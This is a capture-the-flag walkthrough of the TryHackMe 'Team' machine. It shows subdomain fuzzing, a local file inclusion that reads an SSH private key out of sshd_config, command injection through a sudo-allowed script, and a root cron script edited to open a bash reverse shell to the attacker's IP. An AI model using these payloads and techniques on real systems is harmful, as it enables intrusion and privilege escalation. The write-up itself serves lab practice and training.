THM: Team
Team
Beginner friendly boot2root machine
It is aimed at beginners as I often see boxes that are “easy” but are often a bit harder!
Whilst not difficult by any means, I still think this one will trip a few noobs up. This is Team from THM.
Ports
FTP, SSH and HTTP; the triumvirate.
FTP
No anon access; moving on. Actually let’s stay here for a bit. This box had a whole series of breadcrumbs I guess the creator thought you would follow; I circumvented quite a bit at the start and that includes the part involving FTP. But we can discuss it anyway - I do need to skip around a bit though.
If we go to the IP for the page in a browser, we get the Apache default page and in the page source we get:
If you see this add ‘team.thm’ to your hosts!
So if we do that we get an extra page. If you go gobusting or whatever, you can find this page: http://team.thm/scripts/script.txt, and it contains (amongst other things) this line:
Note to self had to change the extension of the old “script” in this folder, as it has creds in
So if we go to http://team.thm/scripts/script.old we can get the old version which contains credentials, which we can use to login to FTP. If we do that, we can get a file with these contents:
Dale I have started coding a new website in PHP for the team to use, this is currently under development. It can be found at “.dev” within our domain.
Also as per the team policy please make a copy of your “id_rsa” and place this in the relevent config file.
Gyles
Right, so we’ve got two users (Dale and Gyles), a dev subdomain and a copy of an SSH key. Well, I missed all of this.
HTTP
There is a hint on the THM room page:
As the “dev” site is under contruction maybe it has some flaws? “url?=” + “This rooms picture”
So we know there is a dev subdomain. Or we can find it easily by fuzzing:
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://team.thm" -H "Host: FUZZ.team.thm" -t 42 --hh 11366
000000019: 200 9 L 20 W 187 Ch “dev”
We add this to /etc/hosts and have a look; we’ve got an easily exploited LFI; e.g.
http://dev.team.thm/script.php?page=/home/ftpuser/.profile
Now bear in mind that I had skipped the FTP part so I didn’t know I was specifically looking for an ssh key in a config file, although I certainly tried looking in /home/dale/.ssh and /home/gyles/.ssh; there are no keys there. I was expecting possibly log poisoning at this point, so I tried reading the logs for apache, vsftpd, auth etc. Nothing. No /proc/self/environ, no mail, nada.
Eventually I user Burp Turbo Intruder on a big list of linux files and found the target - http://dev.team.thm/script.php?page=/etc/ssh/sshd_config
For some reason, this file contains a copy of the SSH private key for dale; who knows why that would be the case. Anyway; onwards.
On the box
We SSH in as dale, no problem. What can he do?
┌──(root💀kali)-[/opt/thm/team]
└─# ssh -i dale_key dale@team.thm
Warning: Permanently added the ECDSA host key for IP address '10.10.125.28' to the list of known hosts.
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ sudo -l
Matching Defaults entries for dale on TEAM:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dale may run the following commands on TEAM:
(gyles) NOPASSWD: /home/gyles/admin_checksAnd what is that?
dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash
printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null
date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak
printf "Stats have been backed up\n"Alright. This took me a bit to figure out but on:
read -p “Enter ‘date’ to timestamp the file: “ error
Whatever is entered is executed as a command. To exploit:
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: doesnt matter
Enter 'date' to timestamp the file: sh
The Date is id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
python3 -c 'import pty;pty.spawn("/bin/bash");'
gyles@TEAM:~$ id;hostname
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
TEAMRoot
I run linpeas as gyles and it screams at me about /usr/local/bin. Here we have a writeable script running as a root cron. Nice.
gyles@TEAM:/usr/local/bin$ ls -lash
total 12K
4.0K drwxrwxr-x 2 root admin 4.0K Jan 17 20:36 .
4.0K drwxr-xr-x 10 root root 4.0K Jan 15 19:49 ..
4.0K -rwxrwxr-x 1 root admin 65 Jan 17 20:36 main_backup.sh
gyles@TEAM:/usr/local/bin$ cat main_backup.sh
#!/bin/bash
cp -r /var/www/team.thm/* /var/backups/www/team.thm/
gyles@TEAM:/usr/local/bin$ printf 'bash -i >& /dev/tcp/10.9.10.123/1234 0>&1\n' >> main_backup.sh
gyles@TEAM:/usr/local/bin$ cat main_backup.sh
#!/bin/bash
cp -r /var/www/team.thm/* /var/backups/www/team.thm/
bash -i >& /dev/tcp/10.9.10.123/1234 0>&1And with a listener:
┌──(root💀kali)-[/opt/thm/team]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.225.48] 58140
bash: cannot set terminal process group (17582): Inappropriate ioctl for device
bash: no job control in this shell
root@TEAM:~# cd /root
cd /root
root@TEAM:~# ls -lash
ls -lash
total 52K
4.0K drwx------ 6 root root 4.0K Jan 17 19:28 .
4.0K drwxr-xr-x 23 root root 4.0K Jan 15 19:51 ..
8.0K -rw------- 1 root root 7.0K Jan 21 19:20 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K drwx------ 2 root root 4.0K Jan 15 22:10 .cache
4.0K drwx------ 4 root root 4.0K Jan 15 22:18 .gnupg
4.0K drwxr-xr-x 3 root root 4.0K Jan 15 20:30 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 18 Jan 15 21:26 root.txt
4.0K -rw-r--r-- 1 root root 66 Jan 17 16:07 .selected_editor
4.0K drwx------ 2 root root 4.0K Jan 15 20:00 .ssh
0 -rw-r--r-- 1 root root 0 Jan 16 22:42 .sudo_as_admin_successful
4.0K -rw-r--r-- 1 root root 215 Jan 17 14:57 .wget-hstsDone. It never ceases to amaze how every single time a new challenge is released someone is asking for hints on the discord almost immediately, even though every new challenge has a 3 day embargo on hints. If this applies to you, have a good hard look at yourself.